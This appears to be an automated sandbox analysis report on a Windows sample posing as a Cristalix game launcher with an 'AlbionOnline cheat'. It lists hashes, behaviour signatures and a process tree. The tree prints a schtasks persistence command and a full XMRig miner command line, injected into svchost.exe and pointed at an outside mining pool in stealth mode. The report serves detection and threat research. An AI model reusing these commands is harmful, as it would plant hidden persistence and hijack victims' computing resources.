Analysis
- max time kernel: 120s
- max time network: 158s
- platform: windows10_x64
- resource: win10v20210408
- submitted: 17-07-2021 22:29
Static task: static1
Behavioral task: behavioral1
Sample: Cristalix/Cristalix_New_t.exe
Resource: win7v20210410
General
- Target: Cristalix/Cristalix_New_t.exe
- Size: 6.5MB
- MD5: c2b39eba635ba5dc92c1a7aaf6999be3
- SHA1: 65800969eb6066c6d3632b176d2c7bb97664a69a
- SHA256: e3bdbc55c8c0d6eb4c87bf3f3670fbb58d6ed8d87d5feb21b502298532a45fbb
- SHA512: 611cc6eaadb361cb4a37915c964778d5caa307027d406295cce41986133c682b1b446f65af156a1ab71c8aacda8934ac3cd29c51e0771340553eac3d6a1d5f61
Malware Config
Signatures
- XMRig Miner Payload (3 IoCs)
  Processes (resource | yara_rule):
  behavioral2/memory/1020-151-0x0000000140000000-0x0000000140758000-memory.dmp | xmrig
  behavioral2/memory/1020-152-0x00000001402EB66C-mapping.dmp | xmrig
  behavioral2/memory/1020-154-0x0000000140000000-0x0000000140758000-memory.dmp | xmrig
- Executes dropped EXE (5 IoCs)
  Processes (pid | process):
  3568 | AlbionOnline cheat v0.1.2.exe
  3976 | CristalixLauncher-3.0.145.exe
  3944 | sihost64.exe
  3948 | Services.exe
  2364 | sihost64.exe
- Legitimate hosting services abused for malware hosting/C2 (1 TTPs)
- Suspicious use of SetThreadContext (1 IoCs)
  Processes (description | pid | process | target process):
  set thread context of 1020 | 3948 | Services.exe | svchost.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Program crash (1 IoCs)
  Processes (pid | pid_target | process | target process):
  408 | 3036 | WerFault.exe | javaw.exe
- Creates scheduled task(s) (1 TTPs, 2 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
- Suspicious behavior: EnumeratesProcesses (18 IoCs)
  Processes (pid | process, repeated entries collapsed with a count):
  408 | WerFault.exe (x14)
  3568 | AlbionOnline cheat v0.1.2.exe (x2)
  3948 | Services.exe (x2)
- Suspicious use of AdjustPrivilegeToken (5 IoCs)
  Processes (description | pid | process):
  Token: SeDebugPrivilege | 408 | WerFault.exe
  Token: SeDebugPrivilege | 3568 | AlbionOnline cheat v0.1.2.exe
  Token: SeDebugPrivilege | 3948 | Services.exe
  Token: SeLockMemoryPrivilege | 1020 | svchost.exe (x2)
- Suspicious use of WriteProcessMemory (36 IoCs)
  Processes (description | pid | process | target process, repeated entries collapsed with a count):
  PID 664 wrote to memory of 3568 | 664 | Cristalix_New_t.exe | AlbionOnline cheat v0.1.2.exe (x2)
  PID 664 wrote to memory of 3976 | 664 | Cristalix_New_t.exe | CristalixLauncher-3.0.145.exe (x3)
  PID 3976 wrote to memory of 3036 | 3976 | CristalixLauncher-3.0.145.exe | javaw.exe (x2)
  PID 3568 wrote to memory of 3372 | 3568 | AlbionOnline cheat v0.1.2.exe | cmd.exe (x2)
  PID 3372 wrote to memory of 796 | 3372 | cmd.exe | schtasks.exe (x2)
  PID 3568 wrote to memory of 3944 | 3568 | AlbionOnline cheat v0.1.2.exe | sihost64.exe (x2)
  PID 3568 wrote to memory of 3948 | 3568 | AlbionOnline cheat v0.1.2.exe | Services.exe (x2)
  PID 3948 wrote to memory of 508 | 3948 | Services.exe | cmd.exe (x2)
  PID 508 wrote to memory of 1176 | 508 | cmd.exe | schtasks.exe (x2)
  PID 3948 wrote to memory of 2364 | 3948 | Services.exe | sihost64.exe (x2)
  PID 3948 wrote to memory of 1020 | 3948 | Services.exe | svchost.exe (x15)
Processes
- C:\Users\Admin\AppData\Local\Temp\Cristalix\Cristalix_New_t.exe (level 1)
  Command line: "C:\Users\Admin\AppData\Local\Temp\Cristalix\Cristalix_New_t.exe"
  - Suspicious use of WriteProcessMemory
  - C:\Users\Admin\AppData\Local\Temp\AlbionOnline cheat v0.1.2.exe (level 2)
    Command line: "C:\Users\Admin\AppData\Local\Temp\AlbionOnline cheat v0.1.2.exe"
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Windows\System32\cmd.exe (level 3)
      Command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit
      - Suspicious use of WriteProcessMemory
      - C:\Windows\system32\schtasks.exe (level 4)
        Command line: schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'
        - Creates scheduled task(s)
    - C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe (level 3)
      Command line: "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
      - Executes dropped EXE
    - C:\Users\Admin\AppData\Local\Temp\Services.exe (level 3)
      Command line: "C:\Users\Admin\AppData\Local\Temp\Services.exe"
      - Executes dropped EXE
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      - C:\Windows\System32\cmd.exe (level 4)
        Command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit
        - Suspicious use of WriteProcessMemory
        - C:\Windows\system32\schtasks.exe (level 5)
          Command line: schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'
          - Creates scheduled task(s)
      - C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe (level 4)
        Command line: "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        - Executes dropped EXE
      - C:\Windows\System32\svchost.exe (level 4)
        Command line: C:\Windows/System32\svchost.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6065131 --pass=myminer --cpu-max-threads-hint=30 --donate-level=5 --cinit-idle-wait=4 --cinit-idle-cpu=80 --cinit-stealth
        - Suspicious use of AdjustPrivilegeToken
  - C:\Users\Admin\AppData\Local\Temp\CristalixLauncher-3.0.145.exe (level 2)
    Command line: "C:\Users\Admin\AppData\Local\Temp\CristalixLauncher-3.0.145.exe"
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    - C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe (level 3)
      Command line: "C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Local\Temp\CristalixLauncher-3.0.145.exe"
      - C:\Windows\system32\WerFault.exe (level 4)
        Command line: C:\Windows\system32\WerFault.exe -u -p 3036 -s 356
        - Program crash
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Temp\AlbionOnline cheat v0.1.2.exe
  MD5: b46efcd7dbf7d2a57ca3e942fffb2214
  SHA1: f8cf84367ce616c00e9966bd08d35084eec64010
  SHA256: 47955703a2e114e77ee02a35df2eae39cebddec17eaa924b9f343241dc9f17a7
  SHA512: f5710091e28a80ef56f1cc37ff867282ca0b9086753d22066427c967130660971f86449cbac92bedb5403cb310a760e6d2bb13bc78e2198b973f304d65c0ea7f
- C:\Users\Admin\AppData\Local\Temp\CristalixLauncher-3.0.145.exe
  MD5: 25b608146d97e46e5cb8d5d4a77440c5
  SHA1: ed5d75d64744a971a7bdb79ba68f4eb0aa7d2cab
  SHA256: 8504825018e604414d2ebb1093cf249c2f1d56125f6f33a20b071d6a008b8dd9
  SHA512: 3ae601c91d804c4d6c402ba73263e5749fafdfe35d68d510dc3b632a85d897bb1dc0e48dee4710deaea5932bcf34deb9ca13d4c0c664848abca0372190fb38b9
- C:\Users\Admin\AppData\Local\Temp\Services.exe
  MD5: b46efcd7dbf7d2a57ca3e942fffb2214
  SHA1: f8cf84367ce616c00e9966bd08d35084eec64010
  SHA256: 47955703a2e114e77ee02a35df2eae39cebddec17eaa924b9f343241dc9f17a7
  SHA512: f5710091e28a80ef56f1cc37ff867282ca0b9086753d22066427c967130660971f86449cbac92bedb5403cb310a760e6d2bb13bc78e2198b973f304d65c0ea7f
- C:\Users\Admin\AppData\Roaming\Microsoft\Libs\WR64.sys
  MD5: 0c0195c48b6b8582fa6f6373032118da
  SHA1: d25340ae8e92a6d29f599fef426a2bc1b5217299
  SHA256: 11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5
  SHA512: ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d
- C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
  MD5: 95099533bd1ac8cb7c824e9bc59a0891
  SHA1: da546ebffa55004dbdf20f17a25a55f89a05f089
  SHA256: 066f3aaa8954a1692953a079afa3725823210bb773756bc37617f799dcb19772
  SHA512: aa0749caa1002a608300ef355be44b09a2a0a845c8620cef2515d888f142633ab53ac8667da51e361f295f8d28e97e6d8b85580e99b8c00b971446d5fb3d3c35
- memory/508-141-0x0000000000000000-mapping.dmp
- memory/796-126-0x0000000000000000-mapping.dmp
- memory/1020-153-0x0000016CDA730000-0x0000016CDA750000-memory.dmp (Filesize: 128KB)
- memory/1020-151-0x0000000140000000-0x0000000140758000-memory.dmp (Filesize: 7.3MB)
- memory/1020-154-0x0000000140000000-0x0000000140758000-memory.dmp (Filesize: 7.3MB)
- memory/1020-152-0x00000001402EB66C-mapping.dmp
- memory/1176-142-0x0000000000000000-mapping.dmp
- memory/2364-144-0x0000000000000000-mapping.dmp
- memory/2364-156-0x0000000001280000-0x0000000001282000-memory.dmp (Filesize: 8KB)
- memory/3036-122-0x0000000000000000-mapping.dmp
- memory/3372-125-0x0000000000000000-mapping.dmp
- memory/3568-124-0x0000000001E00000-0x0000000001E02000-memory.dmp (Filesize: 8KB)
- memory/3568-123-0x000000001D750000-0x000000001D96B000-memory.dmp (Filesize: 2.1MB)
- memory/3568-114-0x0000000000000000-mapping.dmp
- memory/3568-117-0x0000000000EE0000-0x0000000000EE1000-memory.dmp (Filesize: 4KB)
- memory/3944-139-0x0000000000C30000-0x0000000000C32000-memory.dmp (Filesize: 8KB)
- memory/3944-137-0x00000000008E0000-0x00000000008E2000-memory.dmp (Filesize: 8KB)
- memory/3944-131-0x00000000000E0000-0x00000000000E1000-memory.dmp (Filesize: 4KB)
- memory/3944-127-0x0000000000000000-mapping.dmp
- memory/3948-130-0x0000000000000000-mapping.dmp
- memory/3948-150-0x00000000038E0000-0x00000000038EA000-memory.dmp (Filesize: 40KB)
- memory/3948-143-0x00000000038C0000-0x00000000038C1000-memory.dmp (Filesize: 4KB)
- memory/3948-140-0x000000001DA02000-0x000000001DA03000-memory.dmp (Filesize: 4KB)
- memory/3976-118-0x0000000000000000-mapping.dmp